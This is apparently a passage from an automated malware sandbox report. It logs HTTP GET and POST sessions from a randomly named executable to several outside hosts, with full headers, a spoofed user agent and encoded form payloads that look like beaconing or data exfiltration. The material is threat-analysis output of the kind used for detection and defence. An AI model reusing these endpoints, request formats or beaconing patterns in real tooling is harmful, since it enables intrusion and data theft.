6e 46 4c 78 54 67 77 6c 56 65 38 53 42 65 6a 79 6d 63 73 52 53 42 49 41 32 6d 30 67 36 6c 34 5a 56 44 6e 4e 74 31 63 52 41 44 65 52 79 4b 6e 34 76 [TRUNCATED]
                          Data Ascii: mZytyNB=X4cns1+Ys7G52uswQPjvRhJ43Q1fRGqgfC9JsCjeCOnVc6KUImOvc78m6gBeGcCWOTYkx9vWBtzkjYCRtXrAXcs4KdcIANPbek8ZQOktkdPWUStOkxnDjcQyCYOZC4CKexUfddI+jrhLHOrUhpvoKvVyQeKBtlCB5s7lPxM/GCKaLDFsUbd9NtyB67AoYWvF2v7COjMEQzrovG5FNLlG4mJRG+e67nF2GnjwfNCsah2PbfYuNLUp4k+GuaFYqK+W2W72btP8krip+t3V7uaEVVVEinFLxTgwlVe8SBejymcsRSBIA2m0g6l4ZVDnNt1cRADeRyKn4vLcZb+C/ycaFNntM+IbAB7jyh7UiBqlvX+g01d4MEboE8j42B4b0ezpVsU0IlnLHWhaO1bXS5piV8jO/2hmHUWWJ2FHzhNcOaKr5Cu9+vnEXtSF1hiDVwxaIMuV40p3Zow1jgdCMmObQxvR8ea1+q5hEWImi0RQqy+Emdmm+efdm4BaQUczeCSj/U2dCbM/qTR6v5QqW9rh5Sjz2hnh01zVidEda6eVcbL45AYQfiv/Zf7f/RcnwX9yqgnqV/prclnC9j1CzsSp+QMNYPRQBPVrVM+6WVVww8YcGizEb+MOkNHVbzO2i3WR4sGyMY1B3lTlfxLdgB6PqFUoOhpZGpjTEYiplsyx1uZcC6uj7Rw4CijVrSMFiMCTdpzhjWrgU6Dft64xosfYKA6ENqxlo+nstK5oobEnTKg/iS/rDaAn14Jsz2mOS+RK4uhp/pZsW3F327u6CHUxhx/xtA8SrqW69HM1tKj10JqvxJsp24ZOXBlZ1jmCwmovI7RNm/bBUyCMPV56y6jqpWmypM0HPL+oiqKz2WmsygE/vO+ox+6TSI2FaVpCZ9dR0h5gtrUWUkm4AIe4ArVtjOJthNk8MD+Pcn0f6rs/Dj0zVK7XNIW/YIgXeIIErcctXOm+ZKKjc2ZIiP40iJ6fQP/HpXp0W1uUND6KUYAuloTi [TRUNCATED]


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.94971843.155.26.24180692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:16:40.771370888 CEST527OUTGET /kwl6/?54D0m=gvohHHH0&mZytyNB=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1EucVb48mJLaeeXAyU/wxkvnKBCdexA== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.cwgehkk.store
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.9497193.33.130.19080692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:17:07.218585014 CEST796OUTPOST /nml2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mybodyradar.net
                          Origin: http://www.mybodyradar.net
                          Referer: http://www.mybodyradar.net/nml2/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 4b 4e 41 6b 76 50 71 4a 6d 33 51 70 7a 79 6d 65 43 30 42 58 51 52 53 4d 31 34 56 39 6c 32 54 37 77 6c 64 51 2b 38 62 6c 62 6a 54 4f 78 72 62 70 71 45 66 57 69 67 58 6c 75 50 68 71 76 30 46 6a 34 6b 39 65 70 46 36 33 51 76 73 4a 50 74 58 72 6c 4c 47 6a 6c 41 41 5a 49 50 64 32 5a 50 69 74 37 42 6c 67 2f 79 59 34 75 47 63 73 45 41 70 4e 73 37 6a 4f 74 76 69 69 2b 66 65 61 53 66 6f 63 33 70 59 45 4a 76 62 71 76 32 41 75 61 2f 45 77 33 4b 31 55 33 46 74 67 48 76 45 4c 41 50 71 70 51 6c 78 6d 57 34 47 74 61 42 66 44 68 4d 6a 44 54 54 6c 56 4b 65 42 54 38 44 52 6b
                          Data Ascii: mZytyNB=KNAkvPqJm3QpzymeC0BXQRSM14V9l2T7wldQ+8blbjTOxrbpqEfWigXluPhqv0Fj4k9epF63QvsJPtXrlLGjlAAZIPd2ZPit7Blg/yY4uGcsEApNs7jOtvii+feaSfoc3pYEJvbqv2Aua/Ew3K1U3FtgHvELAPqpQlxmW4GtaBfDhMjDTTlVKeBT8DRk


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.9497203.33.130.19080692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:17:09.840500116 CEST820OUTPOST /nml2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mybodyradar.net
                          Origin: http://www.mybodyradar.net
                          Referer: http://www.mybodyradar.net/nml2/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 4b 4e 41 6b 76 50 71 4a 6d 33 51 70 38 7a 57 65 45 58 70 58 46 42 53 50 35 59 56 39 76 57 54 2f 77 6c 52 51 2b 39 76 54 62 56 6a 4f 78 4c 72 70 37 31 66 57 6a 67 58 6c 36 2f 68 6a 68 55 46 73 34 6b 77 6a 70 42 36 33 51 76 34 4a 50 74 48 72 6d 38 53 6b 33 67 41 66 44 76 64 77 58 76 69 74 37 42 6c 67 2f 79 63 47 75 47 55 73 45 77 5a 4e 74 65 50 4e 6a 50 69 74 35 66 65 61 57 66 6f 59 33 70 5a 52 4a 72 62 4d 76 31 34 75 61 2b 30 77 33 62 31 58 39 46 74 69 61 2f 46 5a 4f 2f 4c 5a 4a 6e 68 61 65 4b 43 4f 43 52 58 54 69 74 44 64 43 68 73 4f 66 4a 42 30 37 6b 59 4d 32 6e 62 38 64 76 30 32 64 50 58 69 66 44 39 47 79 59 79 6e 37 41 3d 3d
                          Data Ascii: mZytyNB=KNAkvPqJm3Qp8zWeEXpXFBSP5YV9vWT/wlRQ+9vTbVjOxLrp71fWjgXl6/hjhUFs4kwjpB63Qv4JPtHrm8Sk3gAfDvdwXvit7Blg/ycGuGUsEwZNtePNjPit5feaWfoY3pZRJrbMv14ua+0w3b1X9Ftia/FZO/LZJnhaeKCOCRXTitDdChsOfJB07kYM2nb8dv02dPXifD9GyYyn7A==


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.9497213.33.130.19080692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:17:12.382019997 CEST1833OUTPOST /nml2/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.mybodyradar.net
                          Origin: http://www.mybodyradar.net
                          Referer: http://www.mybodyradar.net/nml2/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 4b 4e 41 6b 76 50 71 4a 6d 33 51 70 38 7a 57 65 45 58 70 58 46 42 53 50 35 59 56 39 76 57 54 2f 77 6c 52 51 2b 39 76 54 62 56 72 4f 78 59 6a 70 70 6d 48 57 35 67 58 6c 35 2f 68 75 68 55 46 78 34 6b 34 6e 70 42 2b 4e 51 73 41 4a 4f 4c 4c 72 78 2b 71 6b 75 51 41 66 4d 50 64 78 5a 50 69 43 37 42 56 73 2f 78 30 47 75 47 55 73 45 79 42 4e 6f 37 6a 4e 75 76 69 69 2b 66 65 57 53 66 6f 77 33 70 51 71 4a 72 66 36 76 45 59 75 61 65 6b 77 78 70 4e 58 78 46 74 73 4a 50 45 63 4f 2f 48 47 4a 6e 39 77 65 4c 32 30 43 54 58 54 79 36 2b 4c 51 7a 45 45 46 4b 52 75 77 57 41 6c 79 6e 4c 58 5a 74 35 30 42 66 79 59 49 6a 30 4f 2b 70 6e 57 6a 34 69 6d 54 4e 36 45 64 69 51 48 64 59 37 71 48 31 69 44 33 68 51 70 6f 46 41 4f 6d 4a 56 49 4b 4e 37 56 41 50 4f 4c 56 79 48 4a 4d 5a 45 54 4e 49 43 39 64 69 68 58 4c 39 44 68 4c 59 30 5a 55 38 51 36 6d 6e 56 72 55 6d 4d 37 31 5a 33 73 6b 52 6c 4e 4f 4d 76 66 79 74 56 62 61 34 35 65 75 65 70 41 30 57 33 6f 67 42 79 67 2f 59 63 53 6a 4f 51 50 54 50 38 54 6b 56 [TRUNCATED]
                          Data Ascii: mZytyNB=KNAkvPqJm3Qp8zWeEXpXFBSP5YV9vWT/wlRQ+9vTbVrOxYjppmHW5gXl5/huhUFx4k4npB+NQsAJOLLrx+qkuQAfMPdxZPiC7BVs/x0GuGUsEyBNo7jNuvii+feWSfow3pQqJrf6vEYuaekwxpNXxFtsJPEcO/HGJn9weL20CTXTy6+LQzEEFKRuwWAlynLXZt50BfyYIj0O+pnWj4imTN6EdiQHdY7qH1iD3hQpoFAOmJVIKN7VAPOLVyHJMZETNIC9dihXL9DhLY0ZU8Q6mnVrUmM71Z3skRlNOMvfytVba45euepA0W3ogByg/YcSjOQPTP8TkVaUvcdRJOHy/HcNLXUZhPGOeNI+D58EIEXRVdJF5Sn7yJNaFyn+JrM1GWqD+6D/zfnZgR6NiiTpjFTB5XISsHzKMOylepC5hR4VrCc2U8prwgB60H0ElZzza3zTsSldWoosWDntZ+1Dfv2mRVd8v8lZcG+KPiCc+2fNkkeXZVz+AbinSUTZ+AAD7ywRITnXjyeGLVpGGqX+fQfGgAcE479Pj2JjEzXF4Xrf4AFJaaAXLCYtgAZHMcmbqpIQV3q/hjll0+QutoTLmIabuIqtdd9n16LM4fX3KsCapE/92w66X20rOq3+/IADB42GM+gfRtTHA4F1AWncrgi7daWlG6fc0o2VehEc7Dg5l+jV8WT0Mvbibvqn3p9DHVKeYiVxbg96mAMspPp8CZbgiUGb68PXRjDVLcvkp67Q1U64bPMP9LyQSqjvzud16nlyzn7MOPu3KC/zutkonmMfoazGKJKzYDnmg+cLZPPOSxJI3giLYbjdpX2YLzX9Nn7rJBO7QtxLAlG9V7nx9VWWDc6Eo8h26TH+Gisua/nGHwLF5nQkhEV2xKO2u25ntoXH6oqBq6xNgq5d5gek88bDy0O8nslwDrjFmuXI5+O4C4ilISnfETyC/jjobd0M61StYM1wP7HDdToReOB0v6/HmIm4byXRs3wvvTpb7KUB [TRUNCATED]


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.9497223.33.130.19080692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:17:15.304574013 CEST529OUTGET /nml2/?mZytyNB=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKr2X8+FKhtVfu//Txi/xQnlFJmGhF34A==&54D0m=gvohHHH0 HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.mybodyradar.net
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:17:47.252397060 CEST394INHTTP/1.1 200 OK
                          Server: openresty
                          Date: Thu, 18 Jul 2024 06:17:47 GMT
                          Content-Type: text/html
                          Content-Length: 254
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 5a 79 74 79 4e 42 3d 48 50 6f 45 73 35 48 53 73 45 59 59 6e 41 57 36 50 56 6f 7a 49 41 43 52 2b 38 39 54 6c 48 7a 46 78 54 31 4e 32 6f 66 54 42 42 69 2f 6e 4a 6d 62 71 6d 6e 53 6a 52 71 56 78 50 6f 4e 6e 30 70 77 6c 78 67 4e 6f 33 53 6d 61 64 42 54 48 37 65 6e 73 73 4b 72 32 58 38 2b 46 4b 68 74 56 66 75 2f 2f 54 78 69 2f 78 51 6e 6c 46 4a 6d 47 68 46 33 34 41 3d 3d 26 35 34 44 30 6d 3d 67 76 6f 68 48 48 48 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mZytyNB=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKr2X8+FKhtVfu//Txi/xQnlFJmGhF34A==&54D0m=gvohHHH0"}</script></head></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.949723203.161.55.10280692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:17:52.606554031 CEST787OUTPOST /tb8p/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lacemalt.top
                          Origin: http://www.lacemalt.top
                          Referer: http://www.lacemalt.top/tb8p/
                          Content-Length: 196
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 6e 4d 69 30 42 47 77 71 58 4e 49 41 5a 6b 72 54 47 4d 39 7a 61 4a 66 56 47 4b 6c 67 37 41 70 45 38 65 39 33 71 36 67 59 59 55 2f 50 50 43 68 63 45 2f 55 68 71 49 53 56 6d 37 63 56 2f 32 64 55 78 55 42 5a 64 72 6c 76 47 30 72 39 67 79 56 57 63 44 71 70 30 49 53 33 62 30 61 54 48 65 39 5a 68 72 33 6f 52 63 51 32 34 65 56 4c 39 54 33 6c 6f 57 71 7a 36 62 73 78 75 46 47 5a 37 39 43 43 4e 46 69 78 64 75 70 64 38 50 72 45 41 30 51 58 44 6b 44 6f 71 6b 65 6d 42 5a 44 61 6c 65 4b 4e 31 58 46 77 43 68 47 54 6d 33 75 4d 4c 2f 67 35 45 4e 6d 6d 6e 67 34 42 72 56 4c 39
                          Data Ascii: mZytyNB=nMi0BGwqXNIAZkrTGM9zaJfVGKlg7ApE8e93q6gYYU/PPChcE/UhqISVm7cV/2dUxUBZdrlvG0r9gyVWcDqp0IS3b0aTHe9Zhr3oRcQ24eVL9T3loWqz6bsxuFGZ79CCNFixdupd8PrEA0QXDkDoqkemBZDaleKN1XFwChGTm3uML/g5ENmmng4BrVL9
                          Jul 18, 2024 08:17:53.209460974 CEST533INHTTP/1.1 404 Not Found
                          Date: Thu, 18 Jul 2024 06:17:53 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.949724203.161.55.10280692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:17:55.148562908 CEST811OUTPOST /tb8p/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lacemalt.top
                          Origin: http://www.lacemalt.top
                          Referer: http://www.lacemalt.top/tb8p/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 6e 4d 69 30 42 47 77 71 58 4e 49 41 62 45 62 54 4c 4f 56 7a 50 35 66 61 4c 61 6c 67 30 67 6f 4e 38 65 78 33 71 37 6c 54 59 47 72 50 4f 6a 52 63 56 4f 55 68 74 49 53 56 2b 72 63 55 79 57 64 66 78 55 4d 6d 64 70 42 76 47 33 58 39 67 7a 6c 57 66 30 32 71 30 59 53 35 51 55 62 56 4a 2b 39 5a 68 72 33 6f 52 63 30 63 34 65 4e 4c 2b 6a 48 6c 6e 58 71 73 6c 72 73 32 2b 6c 47 5a 2f 39 43 47 4e 46 69 58 64 71 68 6e 38 4b 76 45 41 32 49 58 44 52 76 76 7a 55 65 67 46 5a 43 58 69 76 6e 67 38 31 59 6c 66 43 36 52 6e 52 75 72 42 2b 41 6e 56 2f 76 39 79 33 34 6d 73 79 43 56 58 7a 67 53 4d 30 52 76 49 37 32 2f 4c 2b 75 73 33 45 6d 39 6a 51 3d 3d
                          Data Ascii: mZytyNB=nMi0BGwqXNIAbEbTLOVzP5faLalg0goN8ex3q7lTYGrPOjRcVOUhtISV+rcUyWdfxUMmdpBvG3X9gzlWf02q0YS5QUbVJ+9Zhr3oRc0c4eNL+jHlnXqslrs2+lGZ/9CGNFiXdqhn8KvEA2IXDRvvzUegFZCXivng81YlfC6RnRurB+AnV/v9y34msyCVXzgSM0RvI72/L+us3Em9jQ==
                          Jul 18, 2024 08:17:55.756464005 CEST533INHTTP/1.1 404 Not Found
                          Date: Thu, 18 Jul 2024 06:17:55 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.949725203.161.55.10280692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:17:57.678827047 CEST1824OUTPOST /tb8p/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.lacemalt.top
                          Origin: http://www.lacemalt.top
                          Referer: http://www.lacemalt.top/tb8p/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 6e 4d 69 30 42 47 77 71 58 4e 49 41 62 45 62 54 4c 4f 56 7a 50 35 66 61 4c 61 6c 67 30 67 6f 4e 38 65 78 33 71 37 6c 54 59 48 54 50 50 52 70 63 48 5a 67 68 73 49 53 56 67 37 63 4a 79 57 64 43 78 55 55 69 64 70 4e 2f 47 79 62 39 6d 52 74 57 65 47 65 71 74 6f 53 35 66 30 62 46 48 65 39 4d 68 6f 50 6b 52 63 45 63 34 65 4e 4c 2b 67 50 6c 75 6d 71 73 2b 72 73 78 75 46 47 72 37 39 43 69 4e 46 62 69 64 71 74 33 38 35 6e 45 41 57 59 58 42 44 33 76 37 55 65 69 4c 35 44 45 69 76 72 6a 38 31 46 65 66 43 2b 33 6e 57 61 72 4e 49 31 48 4a 74 6e 58 68 58 67 43 37 7a 79 30 51 58 64 77 42 6d 38 63 4b 35 2f 62 53 66 66 6e 2f 46 33 4a 35 65 59 68 37 30 6c 6e 65 4d 68 69 44 2b 5a 53 41 68 6b 71 32 2f 37 4f 65 38 41 4e 42 75 4a 4d 4c 57 6f 49 6b 74 65 6f 62 6d 2b 63 64 4f 39 57 6e 7a 6f 67 45 4b 4c 41 4c 44 6d 46 73 45 4c 73 39 31 33 42 65 46 4a 70 77 75 76 6c 45 2b 44 59 63 51 50 39 32 65 74 2b 64 50 46 4f 52 63 53 59 57 36 59 7a 4a 4d 77 6e 59 56 35 32 44 75 77 75 78 66 31 64 54 65 45 68 6b 62 [TRUNCATED]
                          Data Ascii: mZytyNB=nMi0BGwqXNIAbEbTLOVzP5faLalg0goN8ex3q7lTYHTPPRpcHZghsISVg7cJyWdCxUUidpN/Gyb9mRtWeGeqtoS5f0bFHe9MhoPkRcEc4eNL+gPlumqs+rsxuFGr79CiNFbidqt385nEAWYXBD3v7UeiL5DEivrj81FefC+3nWarNI1HJtnXhXgC7zy0QXdwBm8cK5/bSffn/F3J5eYh70lneMhiD+ZSAhkq2/7Oe8ANBuJMLWoIkteobm+cdO9WnzogEKLALDmFsELs913BeFJpwuvlE+DYcQP92et+dPFORcSYW6YzJMwnYV52Duwuxf1dTeEhkblR6YrCpbAJ5IkVxnA1IwW9Sc1n/40AgoEGPJjU+Jzp79ACPY1MyQwEd5K69EpyU7z07CJHkFwK8EvhxwQ+/jPhz/REC/Cyhx1LjWfeqwE7UDVm5PUgQu6m/yrj9BTLZZF5vLdmPTvv2pWMT6Y1ostuixs5goq/WtvY41TSHx88ERJ37hzIYCa0TgqGtekCcji+0X+3TyvbAGxjgthpaK1ZCXLcTysw4QaCgFtmO4VoThxQmNDFKTrkiaUxALHlWAaYeLT136Krr36U00TkNgNZmsDThUiNB+7OQs876PDP2gJ0oJImpCyVWLSK1zTrFi+yvIYybPSKx+fQv43cyOD+ACupKmai+QQzng5REUwB4mwyfBUQ/e1a2+EGDiQPqF4ZgLUfZHHmmBYbtetyWf84A2ZpINw5hww1hNcdOLuYkzIugJGeZhw77sthT6Y1Zw9h2jFh2rEW0amw7hF+qVxYYeXluB5x9yPLGI9hzX7jDD6ikjHGecBtAvvWWxDpdHJzyACBqoGxtHv7lSDaDuAd+RCTdeeP9Wmqt3K/irKmwzz4Lsy7CgWiTIpLw6wWPGcGwc/S/L5qTyEY5parK+lCeLXiYJRel5p71H6vTQz1wDtFyc8zQuXK/B+L//TEdBWLmsM6BvdoEXL1x0KsduYzlVM9u5GKWW2x [TRUNCATED]
                          Jul 18, 2024 08:17:58.292809963 CEST533INHTTP/1.1 404 Not Found
                          Date: Thu, 18 Jul 2024 06:17:58 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
